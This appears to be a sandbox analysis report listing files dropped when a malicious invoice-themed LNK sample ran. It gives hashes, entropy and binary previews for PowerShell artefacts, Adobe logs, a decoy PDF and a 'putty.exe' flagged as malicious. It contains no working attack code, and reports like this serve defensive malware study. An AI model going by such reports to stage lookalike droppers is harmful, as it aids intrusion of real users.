SHA-256:	E5D444E7824FBCE6150F387117F4799780E6C0FF4FEEFBFD3EC4ACCF5CCF79A1
SHA-512:	C07FC6CCB0EA1F9E61FBA647B029373BA1812E480DCAB63417159E747C84667C1739D45FAAB2D2D878E180B1187E7C68C17BFDAF1DA097E206A17B3444594BCC
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	3012
Entropy (8bit):	5.469001842458976
Encrypted:	false
SSDEEP:	48:eAzsSU4xymdajgs4RIoUxqr9t5/78NfRr2qGxJZKaVEouYAgwd64rHLjtvx:eAzlHxvTsIfeqrh7KfR4J5Eo9Adrxx
MD5:	5D6C6FDD3A1D0321D4DB25621441E03C
SHA1:	736260318B3243EBCA38BB07F5F124B02AF4AB97
SHA-256:	CA44EB2CBA1DDB2FB3195DD2768A260237D52BB471C24565A825A247F6B3F01A
SHA-512:	0359880264A6B57B685AED7B4DBDB1CACD48C46B0F7A84AA9CFF6580E6E62FBD2FA8A7ED4C448060A6BE5E9423B95560538C6D3858C9B553C6DAE04163E98079
Malicious:	false
Preview:	@...e...........................................................H..............@-....f.J.\|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\MSI75fbc.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.516674370985874
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8qlnxflH:Qw946cPbiOxDlbYnuRKzTflH
MD5:	C70CAF652E94E96FC57363E0533679C4
SHA1:	71F85448DCD0A708FD372756370670076CC12DA3
SHA-256:	1BAC4595065C845D3CFAECA0EDA097D131148B26F64CC87DA6C572EF20832925
SHA-512:	388C7792DB83D283FB42BB6E0055E697D15D1D348D38951B3F855D75A809DCFE61F515DD298259C07FD606B4AF4C72319FD31FD6B6B6158A2A36C08369CD7D2D
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.2./.1.1./.2.0.2.4. . .0.9.:.5.0.:.3.2. .=.=.=.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ytr1hm5.1nd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_clabgg5p.4ci.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnb3akyx.5eu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_miifgq30.azb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qiee3nuo.crw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rb1had4p.y24.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rq4wzzfs.toa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yijntg33.sys.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-22 09-50-26-746.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.386483451061953
Encrypted:	false
SSDEEP:	384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
MD5:	F49CA270724D610D1589E217EA78D6D1
SHA1:	22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
SHA-256:	D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
SHA-512:	181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
Malicious:	false
Preview:	SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.351791655241149
Encrypted:	false
SSDEEP:	384:oU+FGMS9n6XVE8pyWIMlJYkxliPBwbLZkbSjGjojAjwjrfNz1n98bjglCVeVghgx:1ri
MD5:	76062ECD38C8A7187227164695445DA6
SHA1:	4E9D6637A90FEF2599F31AD70597D3DF907A9E75
SHA-256:	E05223690514E611BBAB8B60CD6F8358AF6CEC064E9AD9CE5DC36830C5B73671
SHA-512:	EF264D05541889C0F19C99B344401EE52BF2FA89524B618A1923EB4305D395039C14F73F1473127CECF80DA1150D4224A10E1ECD9328A42F80514EC81B9CE1C4
Malicious:	false
Preview:	SessionID=a7892948-651d-44cb-9857-97ef5ec9d4b9.1732287026757 Timestamp=2024-11-22T09:50:26:757-0500 ThreadID=5188 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=a7892948-651d-44cb-9857-97ef5ec9d4b9.1732287026757 Timestamp=2024-11-22T09:50:26:758-0500 ThreadID=5188 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=a7892948-651d-44cb-9857-97ef5ec9d4b9.1732287026757 Timestamp=2024-11-22T09:50:26:758-0500 ThreadID=5188 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=a7892948-651d-44cb-9857-97ef5ec9d4b9.1732287026757 Timestamp=2024-11-22T09:50:26:758-0500 ThreadID=5188 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=a7892948-651d-44cb-9857-97ef5ec9d4b9.1732287026757 Timestamp=2024-11-22T09:50:26:758-0500 ThreadID=5188 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	35721
Entropy (8bit):	5.413940379571121
Encrypted:	false
SSDEEP:	768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRt:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRn
MD5:	50191718442174E867AA8A5A932869EE
SHA1:	D30729146FB758FF60BCA65514F68CA8F2C936D6
SHA-256:	FCE98C2B8339ACC4CE5A98636BB816654218E03FE5EF77D561EB78809E33CBE7
SHA-512:	455D2FB028E0656634BA142F74C3599E1FEEE8F91A49A4010BF143D98C53ACD90EEFB5A2AF88CCF781C79A13BDB9F35DE8D1A0E251EC6E468708F942E1FE3EF0
Malicious:	false
Preview:	05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : *************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***********************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\166616d1-0977-43d8-ac3f-2f610d414ffa.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57837
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/W5aWL07oFGZfLYIGNP+dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07c:u5aWLxFGZTZGw3mlind9i4ufFXpAXkrj
MD5:	D2BE7227AB6B1EAB0E6BC56BC6F60FF1
SHA1:	F706B284AF8C03DCC2E2F2A4C542055970E8F095
SHA-256:	0AF7163484EF82025CB778BF763A4BE18BF74A7C143E979973757AEA2CF13F54
SHA-512:	24EDC3BAA057DBC0ABF9CF0A711B736EA15C34241933E9A4C6BA724A24F7B3BECB4801B2A74D5716F0865BEACF5BDE049F02C16F8C5F51289B47D41B8ACA6F5A
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\842a5ffa-5a0a-4e46-9a38-4dc5a587435b.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/rKdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWL07oYGZQeYIGNPB:Ta3mlind9i4ufFXpAXkrfUs0kWLxYGZQ
MD5:	81778DB3CD3E202CD8FEB47572C9DF55
SHA1:	A030EAB46FE2ED66D14270A86F44303F0D742019
SHA-256:	2E4A0CE023C75E0A53D82D4D08DC4ACD144039D04CEA94103C26535CB5B56998
SHA-512:	97BFD23BD03D6E911059092ED0C44779588CE29AE31E8FA1510A7FEE2B92B9E07AE2FFD4614D2566D369E48554269DC95DE42E062E533A4AA5EEC4DBAAAD3D1B
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\d8b8710d-c14f-4471-9d70-7584ddafda17.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\acrocef_low\e258e497-882a-4e54-b416-d2868e7375c7.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\putty.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1663264
Entropy (8bit):	6.929148215184974
Encrypted:	false
SSDEEP:	49152:Plp9tHfYoEaTSiz23THT3WSMpDgF/qB0Rj6KIeVSc/zui+:PX/LEQkF/qBk6K2c/ii+
MD5:	5EFEF6CC9CD24BAEEED71C1107FC32DF
SHA1:	3CFC9764083154F682A38831C8229E3E29CBE3EF
SHA-256:	E61B8F44AB92CF0F9CB1101347967D31E1839979142A4114A7DD02AA237BA021
SHA-512:	CECD98F0E238D7387B44838251B795BB95E85EC8D35242FC24532BA21929759685205133923268BF8BC0E2DED37DB7D88ECBE2B692D2BE6F09C6D92A57D1FDAC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Invoice-UPS-218931.pdf.lnk.mal.lnk, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."............................@....................................q ....`..................................................H..........@.......8m...... W...................................=..(...0...@............S...............................text...V........................... ..`.rdata..\...........................@..@.data....U..........................@....pdata..8m.......n..................@..@.00cfg..8...........................@..@.gxfg...`*.......,..................@..@.tls.................:..............@..._RDATA..\............<..............@..@.rsrc...@............>..............@..@.reloc........... ..................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\x64dbg.pdf

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PDF document, version 1.5, 1 pages (zip deflate encoded)
Category:	dropped
Size (bytes):	178756
Entropy (8bit):	7.990650247688836
Encrypted:	true
SSDEEP:	3072:V5Pt/KcCzjYpV5ICPFIi1sUNfHJwcWQeuUtI+v52dVE5LXQtBqSmqWY96Pi3s:V5huj05ICtIDUV+QZUd52mXQDRd6n
MD5:	D31A262255AFC9C11D37AED78E70432C
SHA1:	FC79DEB1908C214FD0A86378B4E14C4EC4E06448
SHA-256:	A58DDB258C36C343AFE01875F6F7AE3EC6C3E3886E483AA245894EA4A44FC733
SHA-512:	D1F47F56088B40911471380A1519CECE06C0E74FB1F7045652B6EDAF2AFB2079F08A3070279A7B945D16C1A33871950C86A88053C14DF15389B67DDB3B536AA0
Malicious:	false
